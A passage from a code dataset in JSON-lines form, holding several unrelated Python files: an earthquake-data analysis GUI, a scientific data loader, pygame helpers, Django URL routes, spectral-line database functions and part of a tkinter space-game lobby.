base)\n idm = 0\n for k_ in range(1,k):\n ds = distancia_n(aux_ , len(l), centros[k_], base)\n if(ds < mn):\n ds = mn\n idm = k_\n G[idm].append(i)\n if(ig(GANT,G)):\n break\n GANT = G\n for k_ in range(k):\n for j in range(len(l)):\n centros[k_][j] = 0\n for elem in G[k_]:\n centros[k_][j]+= df[columns[l[j]]][elem]\n etiqueta[elem] = k_ + 1\n if(len(G[k_])):\n centros[k_][j]/=len(G[k_])\n \n G = [[] for i in range(k)]\n \n df['tipo'] = etiqueta\n return df\n\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\ndef pca(data, l, com):\n c_ = data.shape[1]\n used = [0]*c_\n otros = [] \n col_com = [None]*com\n for i in range(com):\n col_com[i] = \"principal_component_\" + str(i + 1)\n columns = data.columns.values\n col = [0]*len(l)\n for i in range(len(l)):\n col[i] = columns[l[i]]\n used[l[i]] = 1\n \n for i in range(c_):\n if(not used[i]):\n otros.append(columns[i])\n \n df = pd.DataFrame(data, columns = col) \n df_otro = pd.DataFrame(data, columns = otros)\n df = StandardScaler().fit_transform(df)\n pca = PCA(n_components = com)\n pc = pca.fit_transform(df)\n pdf = pd.DataFrame(data = pc, columns = col_com)\n \n return pd.concat([df_otro, pdf], axis = 1), pca.explained_variance_ratio_*100\n\n\ndef clase(k, indice, df, l, col, t, idc, nclases):\n a = [0]*len(l)\n distancias = []\n for j in range(len(l)):\n a[j] = df[col[l[j]]][indice]\n \n for i in range(t):\n b = [0]*len(l)\n for j in range(len(l)):\n b[j] = df[col[l[j]]][i]\n distancias.append((distancia_n(a, len(l), b, 2), i))\n distancias.sort()\n cont = [0]*nclases\n for i in range(k):\n cont[df[col[idc]][distancias[i][1]] - 1]+=1\n \n nueva = 1\n mayor = 0\n for i in range(nclases):\n if(cont[i] > mayor):\n mayor = cont[i]\n nueva = i + 1\n \n return nueva\n\ndef knn(data, l, k, idc):\n columns = data.columns.values\n t = data.shape[0]\n df = data.copy() \n nclases = df[columns[idc]].nunique()\n cont_clases = [0]*nclases\n clase_predic = [0]*t\n for i in range(t):\n clase_predic[i] = clase(k, i, df, l, columns, t, idc, nclases)\n cont_clases[clase_predic[i] - 1]+=1 \n df['predicted class'] = clase_predic\n \n return df, np.std(cont_clases)/np.mean(cont_clases), cont_clases\n\n\ndata = pd.read_csv(\"earthquake.csv\")\ndata = data.head(500)\ndata = normalizarfechas(data,[1], 4, 0)\ndata = normalizarfechas(data,[2], 2, 2)\ndata = pd.DataFrame(data, columns = ['id', 'date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \ndata = mapearColumnas(data, [1,2,5,6])\nindices = np.r_[1:5, 6:13]\ndata = normalizarDataset(data, indices)\n_, ratios = pca(data, indices, 2)\nindices = [2,3]\nkmeansdata = kmeans(_, indices, 3, 5, 2)\n\ndef ratio_barplot():\n import matplotlib.pyplot as plt\n _, ratios = pca(data, np.r_[1:5, 6:13], 11)\n ratios_bar = pd.DataFrame({(\"PCA\"+str(i+1)):[ratios[i]] for i in range(len(ratios)-1)})\n ratios_bar.plot.bar(alpha=0.5)\n plt.ylabel('Varianza de ratios', fontsize=16)\n plt.gca().axes.get_xaxis().set_visible(False)\n plt.show()\n\ndef knnvarianza():\n import matplotlib.pyplot as plt\n \"\"\" Codigo real, comentado por tener una ejecución larga\n diferentesknns = []\n y = [] # dataknns\n ks_prob = [2,4,8,16,32,64]\n for i in ks_prob:\n A, B, _ = knn(data, [2,3,4], i, 1)\n diferentesknns.append(A)\n y.append(B)\n \"\"\"\n x = [2,4,8,16,32,64]\n y = [1.1775228235579978, 1.4017703092875093, # dataknns\n 1.7239489551607958, 2.001239615838143,\n 2.2075506789199655, 2.441704322804053]\n plt.figure()\n plt.plot(x, y)\n\n for i_x, i_y in zip(x, y):\n plt.text(i_x, i_y, '({}, {})'.format(i_x, str(round(i_y, 2))))\n plt.ylabel('Coeficiente de varianza', fontsize=16)\n plt.xlabel('Number of Clusters', fontsize=16)\n\n plt.show()\n\ndef kmeansPCA():\n import matplotlib.pyplot as plt\n X = kmeansdata[\"principal_component_1\"]\n Y = kmeansdata[\"principal_component_2\"]\n C = kmeansdata[\"tipo\"]\n plt.figure()\n plt.scatter(X, Y, c=C)\n plt.title('Kmeans de 2 dimensiones')\n plt.xlabel('Componente principal 1', fontsize=16)\n plt.ylabel('Componente principal 2', fontsize=16)\n plt.show()\n\ndef skylinesPCA():\n import matplotlib.pyplot as plt\n datapca, ratios = pca(data, np.r_[1:5, 6:13], 2)\n dfSky = skylines(datapca, [2,3])\n X = pd.concat([datapca[\"principal_component_1\"], dfSky[\"principal_component_1\"]])\n Y = pd.concat([datapca[\"principal_component_2\"], dfSky[\"principal_component_2\"]])\n C = len(datapca)*[\"b\"] + len(dfSky)*[\"r\"]\n\n plt.figure()\n plt.scatter(X, Y, c=C)\n\n plt.title('Skylines de 2 PCA')\n plt.xlabel('Componente principal 1', fontsize=16)\n plt.ylabel('Componente principal 2', fontsize=16)\n\n plt.show()\n\ndef PCA3D():\n import random\n import matplotlib.pyplot as plt\n import numpy as np\n from matplotlib import colors\n from matplotlib.ticker import PercentFormatter\n from mpl_toolkits.mplot3d import Axes3D\n\n indices = [2,3,4]\n data_pca3, ratios = pca(data, indices, 3)\n\n nclases = data_pca3['city'].nunique()\n xs = data_pca3['principal_component_1']\n ys = data_pca3['principal_component_2']\n zs = data_pca3['principal_component_2']\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n for i in range(len(xs)):\n ax.scatter(xs[i], ys[i], zs[i], c = \"#\" + \"%06x\" % random.randint(0, 0xFFFFFF))\n\n ax.set_xlabel('PCA1')\n ax.set_ylabel('PCA2')\n ax.set_zlabel('PCA3')\n\n plt.show()\n\ndef Radar():\n from math import pi\n import matplotlib.pyplot as plt\n def radarPlot(df, row, categorias, color,title):\n N = len(categorias)\n valores = df.loc[df.index[row]].values[categorias].flatten().tolist() \n valores += valores[:1]\n angulos = [n / float(N) * 2 * pi for n in range(N)]\n angulos += angulos[:1]\n ax = plt.subplot(3, 2, row + 1, polar=True, )\n ax.set_theta_offset(pi / 2)\n ax.set_theta_direction(-1)\n etiquetas = [df.columns[i] for i in categorias]\n plt.xticks(angulos[:-1], etiquetas, color='grey', size=8)\n ax.set_rlabel_position(0)\n tic = 5\n plt.yticks([i * (1.0 / tic) for i in range(1,tic)], [str(i * (1.0 / tic)) for i in range(1,tic)], color=\"grey\", size=7)\n plt.ylim(0,1)\n ax.plot(angulos, valores, color=color, linewidth=2, linestyle='solid')\n ax.fill(angulos, valores, color=color, alpha=0.4)\n plt.title(title.capitalize(), size=11, color=color, y=1.1)\n def radarAllPlot(df,categorias):\n my_dpi=96\n plt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\n my_palette = plt.cm.get_cmap(\"Set2\", len(df.index))\n for i in range(len(df.index)):\n radarPlot(df,i,categorias,my_palette(i), data['city'][i])\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 4, 0)\n data = normalizarfechas(data,[2], 2, 2)\n data = pd.DataFrame(data, columns = ['date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [0,1,5])\n indices = np.r_[:4, 6:8]\n data = normalizarDataset(data, indices)\n maximin_ = maximin(data, indices)\n maximin_.head()\n radarAllPlot(maximin_.head(6),indices)\n plt.show()\n\ndef plotWA():\n import matplotlib.pyplot as plt\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 4, 0)\n data = normalizarfechas(data,[2], 2, 2)\n data = pd.DataFrame(data, columns = ['id', 'date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [1,2,5,6])\n pesos = [0, 0, 10, 10, 10, 0, 30, 10, 10, 10, 10]\n dfWA = weightedAverage(data, pesos, [0, 1, 2, 3, 6, 7])\n\n x = [i for i in range(len(dfWA['id']))]\n y = dfWA['wa']\n\n import numpy as np\n poly = np.polyfit(x,y,11)\n poly_y = np.poly1d(poly)(x)\n plt.plot(x,y, alpha=0.5)\n plt.plot(x,poly_y)\n\n plt.title('Weighted Average')\n plt.xlabel('Indices (orden por fecha)', fontsize=16)\n plt.ylabel('WA', fontsize=16)\n\n plt.show()\n\ndef Radar2():\n import matplotlib.pyplot as plt\n import numpy as np\n from math import pi\n month_lst = ['January', 'Feburary', 'March', 'April', 'May', 'June', 'July', \n 'August', 'September', 'October', 'November', 'December']\n def radarPlot(df, row, categorias, color,title):\n N = len(categorias)\n valores = df.loc[df.index[row]].values[categorias].flatten().tolist() \n valores += valores[:1]\n angulos = [n / float(N) * 2 * pi for n in range(N)]\n angulos += angulos[:1]\n ax = plt.subplot(3, 2, row + 1, polar=True, )\n ax.set_theta_offset(pi / 2)\n ax.set_theta_direction(-1)\n etiquetas = [df.columns[i] for i in categorias]\n plt.xticks(angulos[:-1], etiquetas, color='grey', size=8)\n ax.set_rlabel_position(0)\n tic = 5\n plt.yticks([i * (1.0 / tic) for i in range(1,tic)], [str(i * (1.0 / tic)) for i in range(1,tic)], color=\"grey\", size=7)\n plt.ylim(0,1)\n ax.plot(angulos, valores, color=color, linewidth=2, linestyle='solid')\n ax.fill(angulos, valores, color=color, alpha=0.4)\n plt.title(str(month_lst[title-1]).capitalize(), size=11, color=color, y=1.1)\n def radarAllPlot(df,categorias):\n my_dpi=96\n plt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\n my_palette = plt.cm.get_cmap(\"Set2\", len(df.index))\n for i in range(len(df.index)):\n radarPlot(df,i,categorias,my_palette(i), data['date'][i])\n def normalizacionColumna(df, i):\n columns = df.columns.values\n df[columns[i]] = (df[columns[i]] - data[columns[i]].min()) / (df[columns[i]].max() - data[columns[i]].min())\n def normalizarDataset(data, indices):\n df = data.copy()\n for i in indices:\n normalizacionColumna(df, i)\n return df\n def normalizarfechas(data, indices, ini, fin, medio):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n a = []\n for j in range(data.shape[0]):\n if(medio != -1):\n st = df[columns[i]][j][ini:-fin]\n else:\n st = df[columns[i]][j][:ini]\n if(fin != 0):\n st+= df[columns[i]][j][-fin:]\n a.append(st)\n df[columns[i]] = a\n return df\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 5, 3, 0)\n data = normalizarfechas(data,[2], 2, 2, -1)\n data = pd.DataFrame(data, columns = ['date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [0,1,4,5])\n indices = np.r_[1:5, 6:9]\n data = normalizarDataset(data, indices)\n dflx = leximax(data, indices)\n dflx.head(6)\n radarAllPlot(dflx.head(6),indices)\n plt.show()\n\ndef FreqAprox():\n def normalizacionColumna(df, i):\n columns = df.columns.values\n df[columns[i]] = (df[columns[i]] - data[columns[i]].min()) / (df[columns[i]].max() - data[columns[i]].min())\n \n def normalizarDataset(data, indices):\n df = data.copy()\n for i in indices:\n normalizacionColumna(df, i)\n return df\n\n def mapearColumna(df, col):\n val = []\n for j in range(df.shape[0]):\n val.append(df[col][j])\n unicos = list(set(val))\n for j in range(df.shape[0]):\n indice = 0\n for _ in range(len(unicos)):\n if(unicos[_] == df[col][j]):\n indice = _ + 1\n break\n val[j] = indice\n return val\n\n def mapearColumnas(data, indices):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n df[columns[i]] = mapearColumna(df, columns[i])\n return df\n\n def normalizarfechas(data, indices, ini, fin, medio):\n df = data.copy()\n columns = df.columns.values\n for i in indices:\n a = []\n for j in range(data.shape[0]):\n if(medio != -1):\n st = df[columns[i]][j][ini:-fin]\n else:\n st = df[columns[i]][j][:ini]\n if(fin != 0):\n st+= df[columns[i]][j][-fin:]\n a.append(st)\n df[columns[i]] = a\n return df\n import matplotlib.pyplot as plt\n import pandas as pd\n import numpy as np\n data = pd.read_csv(\"earthquake.csv\")\n data = data.head(500)\n data = normalizarfechas(data,[1], 5, 3, 0)\n data = normalizarfechas(data,[2], 2, 2, -1)\n data = pd.DataFrame(data, columns = ['date', 'time', 'lat', 'long', 'city', 'direction', 'depth', 'xm', 'md', 'richter', 'ms', 'mb']) \n data = mapearColumnas(data, [0,1,4,5])\n indices = np.r_[0:5, 6:9]\n data = normalizarDataset(data, indices)\n data.head()\n a,b,c = knn(data, indices, 4,5)\n\n x = [i for i in range(len(c))]\n y = c\n \n plt.plot(x,y)\n\n plt.title('Direcciones de terremotos predecidas')\n plt.ylabel('Frecuencia', fontsize=16)\n plt.xlabel('Dirección', fontsize=16)\n\n plt.show()\n\n##################################################################\nfrom tkinter import *\nimport webbrowser\n\nroot = Tk()\nroot.winfo_toplevel().title(\"TF - Administración de la información\")\nroot.geometry(\"400x300\")\n\ndef callback(url):\n webbrowser.open_new(url)\nlink1 = Label(root, text=\"Earthquakes in 1910-2017\", fg=\"blue\", cursor=\"hand2\")\nlink1.pack()\nlink1.bind(\"\", lambda e: callback(\"https://www.kaggle.com/caganseval/earthquake\"))\n##\n\ngraphicRat = Button(root, text=\"Explained variance ratio of PCA\", width=40, command = ratio_barplot)\ngraphicRat.pack()\n\ngraphicPCA3D = Button(root, text=\"Componentes principales 3D\", width=40, command = PCA3D)\ngraphicPCA3D.pack()\n\ngraphicKmeanPCA = Button(root, text=\"Kmean-PCA\", width=40, command = kmeansPCA)\ngraphicKmeanPCA.pack()\n\ngraphicKnn = Button(root, text=\"Coeficiente de varianza en Knn\", width=40, command = knnvarianza)\ngraphicKnn.pack()\n\ngraphicSkylinesPCA = Button(root, text=\"Skylines de 2 PCA\", width=40, command = skylinesPCA)\ngraphicSkylinesPCA.pack()\n\ngraphicRadar = Button(root, text=\"Maximin data real\", width=40, command = Radar)\ngraphicRadar.pack()\n\ngraphicRadar2 = Button(root, text=\"Leximax Data real Top Terremotos por Mes\", width=40, command = Radar2)\ngraphicRadar2.pack()\n\ngraphicWA = Button(root, text=\"Weighted Average\", width=40, command = plotWA)\ngraphicWA.pack()\n\ngraphicFreqAprox = Button(root, text=\"Direcciones de terremotos predecidas con Knn\", width=40, command = FreqAprox)\ngraphicFreqAprox.pack()\n\nroot.mainloop()\n","sub_path":"Interfaz/main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":20715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"42015653","text":"# Copyright (c) 2014--2020 Tony (Muhammad) Yousefnezhad\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport numpy as np\nimport scipy.io as sio\n\n\ndef LoadEzData(Header=None,data=None):\n if Header is None:\n print(\"Please enter header file!\")\n return None\n\n if not os.path.isfile(Header):\n print(\"Header file is not found!\")\n return None\n\n try:\n Out = sio.loadmat(Header, appendmat=False)\n Int = Out[\"Integration\"]\n except:\n print(\"Cannot load header file!\")\n return None\n try:\n DataStruct = Int[\"DataStructure\"][0]\n DataKey = list()\n for key in DataStruct:\n if data is None:\n DataKey.append(key)\n else:\n if key in data:\n DataKey.append(key)\n\n if not len(DataKey):\n print(\"WARNING: No data key found!\")\n else:\n if Out['DataFileType'][0][0] == 0:\n print(\"Data file type is NII.GZ\")\n else:\n print(\"Data file type is EZMAT\")\n for dkey in DataKey:\n X = None\n dfiles = np.array(Int[dkey[0] + \"_files\"])[0][0]\n for fdata in dfiles:\n try:\n if Out['DataFileType'][0][0] == 0:\n import nibabel as nb\n niiimgdata = nb.load(str.strip(os.path.dirname(Header) + \"/\" + fdata))\n dat = np.transpose(niiimgdata.get_data())\n X = dat if X is None else np.concatenate((X, dat))\n del dat, niiimgdata\n else:\n dat = sio.loadmat(str.strip(os.path.dirname(Header) + \"/\" + fdata), appendmat=False)[dkey[0]]\n X = dat if X is None else np.concatenate((X,dat))\n del dat\n print(\"Data %s is load!\" % (fdata))\n except Exception as e:\n print(str(e))\n return None\n Out[dkey[0]] = X\n except:\n print(\"DEBUG: Error in loading data files!\")\n return None\n return Out\n","sub_path":"IO/EasyData.py","file_name":"EasyData.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"380634287","text":"'''\nCreated on Oct 27, 2013\n\n@author: Dean, God Almighty of Sex and Women\n'''\nimport pygame, sys, os, math\nfrom pygame.locals import *\n\n\ndef get_image(path, colorkey):\n image = pygame.image.load(path).convert()\n image.set_colorkey(colorkey)\n return image\n\ndef create_image_list(path, filename, numimages, filetype, colorkey):\n imagelist = []\n if numimages >= 10:\n for i in range(0,numimages+1):\n if i < 10:\n imageloc = os.path.join(path, filename) +'0' + str(i) + filetype\n image = get_image(imageloc,colorkey)\n imagelist.append(image)\n \n else:\n imageloc = os.path.join(path, filename) + str(i) + filetype\n image = get_image(imageloc, colorkey)\n imagelist.append(image)\n else:\n for i in range(0,numimages + 1):\n imageloc = os.path.join(path,filename) + str(i) + filetype\n image = get_image(imageloc,colorkey)\n imagelist.append(image)\n \n return imagelist\n\ndef load_imageset(imagedict):\n images = {}\n for item in imagedict.keys():\n images[item] = create_image_list(imagedict[item][0], imagedict[item][1], imagedict[item][2], '.bmp', (255,0,255))\n return images\n\ndef xfrange(start, stop, step):\n if step > 0:\n while start < stop:\n yield start\n start += step\n \n else:\n while start < stop:\n yield start\n start -= step\n \n \ndef get_dist(pos1, pos2):\n return (int(abs(pos1[0] - pos2[0])))^2 + (int(abs(pos1[1] - pos2[1])))^2\n \ndef textHollow(font, message, fontcolor):\n notcolor = [c^0xFF for c in fontcolor]\n base = font.render(message, 0, fontcolor, notcolor)\n size = base.get_width() + 2, base.get_height() + 2\n img = pygame.Surface(size, 16)\n img.fill(notcolor)\n base.set_colorkey(0)\n img.blit(base, (0, 0))\n img.blit(base, (2, 0))\n img.blit(base, (0, 2))\n img.blit(base, (2, 2))\n base.set_colorkey(0)\n base.set_palette_at(1, notcolor)\n img.blit(base, (1, 1))\n img.set_colorkey(notcolor)\n return img\n\ndef textOutline(font, message, fontcolor, outlinecolor):\n base = font.render(message, 0, fontcolor)\n outline = textHollow(font, message, outlinecolor)\n img = pygame.Surface(outline.get_size(), 16)\n img.blit(base, (1, 1))\n img.blit(outline, (0, 0))\n img.set_colorkey(0)\n return img\n\n\n\n \n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"228082149","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n #posts\n path('', views.all_posts, name=\"index\"),\n path('create_post', views.create_post, name=\"create_post\"),\n path('update_post', views.update_post,name=\"update_post\"),\n path('delete_post', views.delete_post, name=\"delete_post\"),\n path('detail_post', views.detail_post,name=\"detail_post\"),\n #comments\n path('show_comments/', views.show_post_comments)\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92051350","text":"\"\"\"\nFunctions for reading theoretical data from the database.\nAuthor: Lilla Lugosi\nDate: 20/08/2019\nName: theoretical_function.py\n\"\"\"\n\nfrom theory_db_helper import *\nfrom calibration_function import *\nfrom scipy.signal import find_peaks\n\n\ndef chargelist_for_element(ts,element_name):\n \"database, chemical symbol for element\\nReturns list of charge states available in the database\"\n data=ts.query({'element':element_name})\n ch = [x['charge'] for x in data]\n chargelist=np.unique(ch)\n return chargelist\n\n\ndef find_waves(ts,elementname,ch):\n \"database, chemical symbol for element,on of the available charge states\\n Fid the highest intensity peak. On that energy level find the highest peaks. Returns list of wavelength of the highest peaks\"\n part=ts.query({'element':elementname,'charge':int(ch)})\n int_max = max([x['intensity'] for x in part])\n int_min = min([x['intensity'] for x in part])\n\n intens = [x['intensity'] for x in part]\n idx=intens.index(int_max)\n\n Emax=part[idx][\"energy\"]\n\n wave=[]\n for i in range(len(part)):\n if part[i][\"intensity\"] > ((int_max-int_min)*0.1+int_min) and part[i][\"energy\"]== Emax:\n wave.append(part[i][\"wavelength\"])\n return wave\n\n\ndef get_energy_intensity(ts,charges,element_name):\n \"database, available charge states, chemical symbol for element\\nReturns matrix of energies and intensities. First index refers to one charge state, second index for peaks at one wavelength\"\n E=[[] for _ in range(len(charges))]\n I=[[] for _ in range(len(charges))]\n wavedat=[[] for _ in range(len(charges))]\n for i in range(len(charges)): \n waves=find_waves(ts,element_name,charges[i]) \n wavedat[i]=waves\n for j in range(len(waves)):\n partwave=ts.query({'element':element_name,'charge':int(charges[i]),\"wavelength\":waves[j]})\n en=[]\n inte=[]\n for k in range(len(partwave)):\n #if partwave[k][\"energy\"] not in en:\n en.append(partwave[k][\"energy\"])\n #if partwave[k][\"intensity\"] not in inte:\n inte.append(partwave[k][\"intensity\"])\n E[i].append(en)\n I[i].append(inte)\n return E, I,wavedat\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"theoretical_function.py","file_name":"theoretical_function.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"206688947","text":"from tkinter import *\nimport os,os.path\nimport random\n\nclass Vue():\n\tdef __init__(self,parent,ip,nom):\n\t\tself.parent=parent\n\t\tself.root=Tk()\n\n\t\t#self.root.attributes('-fullscreen', 1) #Pour full screen\n\t\tself.root.configure(bg='#1c4873') # Background de ma page\n\t\t\n\t\tself.button = Button(self.root, text=\"X\", command=self.root.destroy, font='arial 20', relief=FLAT,bg='#1c4873',foreground=\"white\")\n\t\tself.button.pack(side=TOP, anchor=E) \n\t\t\n\t\tself.cadreactif=None\n\t\tself.maselection=None\n\t\tself.root.title(os.path.basename(sys.argv[0]))\n\t\tself.modele=None\n\t\tself.nom=\"\"\n\t\tself.cadreapp=Frame(self.root,width=800,height=600)\t\t\t#Frame de base a mes fenetre\n\t\tself.cadreapp.pack(fill=\"none\", expand=True) # Pour centrer la fenetre\n\t\tself.creercadresplash(ip,nom)\n\t\tself.creercadrelobby()\n\t\tself.changecadre(self.cadresplash)\n\t\tself.vbar = None\n\t\tself.hbar = None\n\t\t\n\tdef fermerfenetre(self):\n\t\tself.parent.fermefenetre()\n\t\t\n\tdef changecadre(self,cadre):\n\t\tif self.cadreactif:\n\t\t\tself.cadreactif.pack_forget()\n\t\tself.cadreactif=cadre\n\t\tself.cadreactif.pack()\n\t\t\t\n\tdef creercadresplash(self,ip,nom):\n\t\t\n\t\tself.cadresplash=Frame(self.cadreapp,bg='#15243d')\n\t\n\t\tself.titre = Label(self.cadresplash, text = \"Bienvenue dans la galaxie orion voyageur!\",bg='#15243d',font='arial 20',foreground=\"white\")\n\t\tself.titre.pack(pady=(100,20),padx=100);\n\t\t\n\t\tsoustitre=Label(self.cadresplash, text = \"Pour des fin de securite veuillez vous identifier\",bg='#15243d',font='arial 16',foreground=\"white\")\n\t\tsoustitre.pack(pady=10,padx=10);\n\t\t\n\t\tself.nomsplash=Entry(self.cadresplash,bg='#A3C5D8',relief=FLAT,foreground=\"white\",font='arial 14',highlightthickness=2,highlightcolor='#849fae')\n\t\tself.nomsplash.insert(0, nom)\n\t\tself.nomsplash.pack(pady=10)\n\t\t\n\t\tself.ipsplash=Entry(self.cadresplash,bg='#A3C5D8',relief=FLAT,foreground=\"white\",font='arial 14',highlightthickness=2,highlightcolor='#849fae')\n\t\tself.ipsplash.insert(0, ip)\n\t\tself.ipsplash.pack(pady=20)\n\t\t\n\t\t\n\t\tbtncreerpartie=Button(self.cadresplash,text=\"Creer partie\",bg='#A3C5D8',command=self.creerpartie,relief=FLAT,font='arial 12')\n\t\tbtncreerpartie.pack(fill=\"both\", expand=True,side=LEFT, padx=(75,5),pady=(0,50))\n\t\tbtnconnecterpartie=Button(self.cadresplash,text=\"Connecter partie\",bg='#A3C5D8',command=self.connecterpartie,relief=FLAT,font='arial 12')\n\t\tbtnconnecterpartie.pack(fill=\"both\", expand=True,side=LEFT,padx=(5,75),pady=(0,50))\n\t\t\n\n\t\t\t\n\tdef creercadrelobby(self):\n\t\tself.cadrelobby=Frame(self.cadreapp,bg='#15243d')\n\t\t\n\t\tself.titre=Label(self.cadrelobby,text=\"Rebonjour Voyageur\",bg='#15243d',font='arial 20',foreground=\"white\")\n\t\tself.titre.pack(pady=(50,0))\n\t\t\t \n\t\t\n\t\tself.listelobby=Listbox(self.cadrelobby,bg='#A3C5D8',borderwidth=0,relief=FLAT,width=60,height=20)\n\t\tself.listelobby.pack(side=LEFT,pady=50,padx=(75,10));\n\t\t\n\t\tself.nbetoile=Entry(self.cadrelobby,bg='#A3C5D8',width=30,relief=FLAT,font='arial 12',justify=CENTER)\n\t\tself.nbetoile.insert(0, 100)\n\t\tself.nbetoile.pack(pady=(50,10),padx=(10,75));\n\t\t\n\t\tself.largeespace=Entry(self.cadrelobby,bg='#A3C5D8',width=30,relief=FLAT,font='arial 12',justify=CENTER) \n\t\tself.largeespace.insert(0, 1000)\n\t\tself.largeespace.pack(pady=(10,10),padx=(10,75));\n\t\t\n\t\tself.hautespace=Entry(self.cadrelobby,bg='#A3C5D8',width=30,relief=FLAT,font='arial 12',justify=CENTER)\n\t\tself.hautespace.insert(0, 800)\n\t\tself.hautespace.pack(pady=(10,10),padx=(10,5));\n\t\t\n\t\tbtnlancerpartie=Button(self.cadrelobby,text=\"Lancer partie\",command=self.lancerpartie,bg='#A3C5D8',relief=FLAT,font='arial 12')\n\t\tbtnlancerpartie.pack(fill=X,pady=(0,50),padx=(10,75),side=BOTTOM)\n\t\t\n\n\t\t\n\tdef connecterpartie(self):\n\t\tnom=self.nomsplash.get()\n\t\tip=self.ipsplash.get()\n\t\tif nom and ip:\n\t\t\tself.parent.inscrirejoueur()\n\t\t\tself.changecadre(self.cadrelobby)\n\t\t\tprint(\"BOUCLEATTENTE de CONNECTER\")\n\t\t\tself.parent.boucleattente()\n\t\t\n\tdef creerpartie(self):\n\t\tnom=self.nomsplash.get()\n\t\tip=self.ipsplash.get()\n\t\tif nom and ip:\n\t\t\tself.parent.creerpartie()\n\t\t\tself.parent.inscrirejoueur()\n\t\t\tself.changecadre(self.cadrelobby)\n\t\t\tprint(\"BOUCLEATTENTE de CREER\")\n\t\t\tself.parent.boucleattente()\n\t\t\n\tdef lancerpartie(self):\n\t\tself.parent.lancerpartie()\n\t\t\n\tdef affichelisteparticipants(self,lj):\n\t\tself.listelobby.delete(0,END)\n\t\tself.listelobby.insert(0,lj)\n\t\t\n\tdef creeraffichercadrepartie(self,mod):\n\t\tself.nom=self.parent.monnom\n\t\tself.mod=mod\n\t\t\n\t\tjoueur=self.mod.joueurs[self.nom]\n\t\tself.cadrepartie=Frame(self.cadreapp)\n\t\tself.cadrejeu=Frame(self.cadrepartie)\n\t\tself.canevas=Canvas(self.cadrepartie,width=mod.largeur,height=mod.hauteur,bg=\"grey11\",scrollregion=(0,0,self.mod.largeur,self.mod.hauteur))\n\t\tself.hbar=Scrollbar(self.cadrepartie,orient=HORIZONTAL, width=0)\n\t\tself.hbar.pack(side=BOTTOM,fill=X)\n\t\tself.hbar.config(command=self.canevas.xview)\n\t\tself.vbar=Scrollbar(self.cadrepartie,orient=VERTICAL,width = 0)\n\t\tself.vbar.pack(side=RIGHT,fill=Y)\n\t\tself.vbar.config(command=self.canevas.yview)\n\t\tself.canevas.config(width=1920,height=1080)\n\t\tself.canevas.config(xscrollcommand=self.hbar.set, yscrollcommand=self.vbar.set)\n\t\tself.canevas.pack(side=LEFT,expand=True,fill=BOTH)\n\t\tself.canevas.pack(side=LEFT)\n\t\t\n\t\tself.canevas.bind(\"<1>\",\t lambda event: self.canevas.focus_set())\n\t\tself.canevas.bind(\"\",\tlambda event: self.canevas.yview_scroll(-1, \"units\"))\n\t\tself.canevas.bind(\"\", lambda event: self.canevas.xview_scroll(-1, \"units\"))\n\t\tself.canevas.bind(\"\", lambda event: self.canevas.yview_scroll( 1, \"units\"))\t\t\n\t\tself.canevas.bind(\"\", lambda event: self.canevas.xview_scroll( 1, 